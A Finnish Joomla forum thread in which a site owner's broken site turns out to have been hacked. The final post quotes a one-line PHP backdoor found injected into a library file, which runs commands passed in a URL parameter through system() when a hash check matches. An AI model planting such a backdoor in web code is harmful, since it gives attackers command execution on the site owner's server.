Päivittääkö Joomla automaattisesti komponentteja?

  • KrisSe
  • KrisSe hahmo Aiheen kirjoittaja
  • Poissa
  • Tulokas
  • Tulokas
Lisää
18.11.2015 16:23 #8124 : KrisSe
KrisSe loi aiheen: Päivittääkö Joomla automaattisesti komponentteja?
Joomla 3.x.x sivusto toimi loistavasti aina viime viikkoon asti kunnes eräs aamu sivusto avautui valkoisena (Firefox). Chromella avattaessa antoi virheen 500. Ylläpitopuolellekaan ei pääse. Palveluntarjoajan selitys:

"Myös muutama muu samaa julkaisujärjestelmää käyttänyt sivu on hajonnut samalla tavalla, joten on erittäin todennäköistä että joko julkaisujärjestelmä tai jokin sen lisäosa on päivittänyt automaattisesti itsensä ja tällä saanut sivuston rikki. Mitään muuta selitystä sille ei ole miksi tällainen ongelma ilmenee samaa julkaisujärjestelmää käyttävillä sivustoilla samaan aikaan täysin toisistaan riippumattomilla eri palvelimilla joihin ei ole tehty muutoksia."

Kuulostaa uskomattomalta. Yksikään elementti ei ole tähän mennessä päivitynyt itsestään.
Mitä olette mieltä?

Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.

Lisää
18.11.2015 18:20 - 18.11.2015 18:24 #8125 : quietFinn
quietFinn vastasi aiheeseen: Päivittääkö Joomla automaattisesti komponentteja?
Onko Joomla asennettu itse?
Esom. Softaculous päivittää Joomlan automaattisesti jos niin on asetuksissa määritelty.

Toinen asia joka tuli mieleen:
tarkista että tiedostot:
administrator/includes/defines.php
ja
includes/defines.php

ovat tallella.

netFinn - Taatusti Joomla!-yhteensopiva webhosting: www.netfinn.fi
Last Edit: 18.11.2015 18:24 : quietFinn.
Seuraavat käyttäjät sanoivat kiitos: KrisSe

Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.

  • KrisSe
  • KrisSe hahmo Aiheen kirjoittaja
  • Poissa
  • Tulokas
  • Tulokas
Lisää
19.11.2015 08:32 #8126 : KrisSe
KrisSe vastasi aiheeseen: Päivittääkö Joomla automaattisesti komponentteja?
Joomla on itse asennettu.
Nuo mainitsemasi tiedostot ovat tallella.

Lokitiedostojen mukaan palveluntarjoaja on tehnyt muutoksia eli päivitellyt servereitään samaan aikaan kun sivut katosivat. Ei kyllä myönnä sen aiheuttaneen ongelmaa.

Olen jonkun verran Joomla-sivustoja tehnyt ja koskaan ei järjestelmä tai komponentit ole automaattisesti päivitellyt itseään, aina on pitänyt itse hyväksyä ja aina olen ottanut backupin ennen uutta päivitystä.

Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.

Lisää
19.11.2015 08:46 #8127 : quietFinn
quietFinn vastasi aiheeseen: Päivittääkö Joomla automaattisesti komponentteja?

KrisSe kirjoitti: Lokitiedostojen mukaan palveluntarjoaja on tehnyt muutoksia eli päivitellyt servereitään samaan aikaan kun sivut katosivat. Ei kyllä myönnä sen aiheuttaneen ongelmaa.


No mitäs ne lokitiedostot kertovat?

netFinn - Taatusti Joomla!-yhteensopiva webhosting: www.netfinn.fi

Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.

  • KrisSe
  • KrisSe hahmo Aiheen kirjoittaja
  • Poissa
  • Tulokas
  • Tulokas
Lisää
21.11.2015 12:12 #8130 : KrisSe
KrisSe vastasi aiheeseen: Päivittääkö Joomla automaattisesti komponentteja?
En itse tutkinut lokitiedostoja vaan ao. sivuston omistaja, joten en osaa kertoa tarkemmin.
MUTTA kun palveluntarjoajaa kovisteltiin tekemään jotain, he ilmoittivat seuraavaa:

"PHP Fatal error: Namespace declaration statement has to be the very first statement in the script in /home/xxxxx/public_html/libraries/framework/Joomla/Registry/AbstractRegistryFormat.php on line 9

Kyseisessä tiedostossa ei ole kuitenkaan namespacea ensimmäisenä vaan sieltä löytyy PHP -koodia:

<?php if (substr(md5($_GET),0,6) == 'dbed7f') { $time = str_replace('@',' ',$_GET); @system($time); exit; }

Ongelman syynä voi olla, että kotisivutila on hakkeroitu ja tiedostoihin on lisätty haittakoodia, mutta asiasta ei ole vielä varmuutta."

Noh - onneksi löytyi backup lokakuulta, jolla korvasimme kaikki tiedostot ja sivusto saatiin pystyyn.
Tämän tapauksen myötä sain selville, että kyseinen palveluntarjoaja joutuu vähän väliä tietoturvan kanssa ongelmiin. Kannattaa selvitellä kenen huomaan sivustonsa uskoo:)

Kirjaudu tai Rekisteröidy liittyäksesi keskusteluun.

Valvojat: jkwebdesignGamossJiiKoo
Sivu luotiin ajassa: 0.088 sekuntia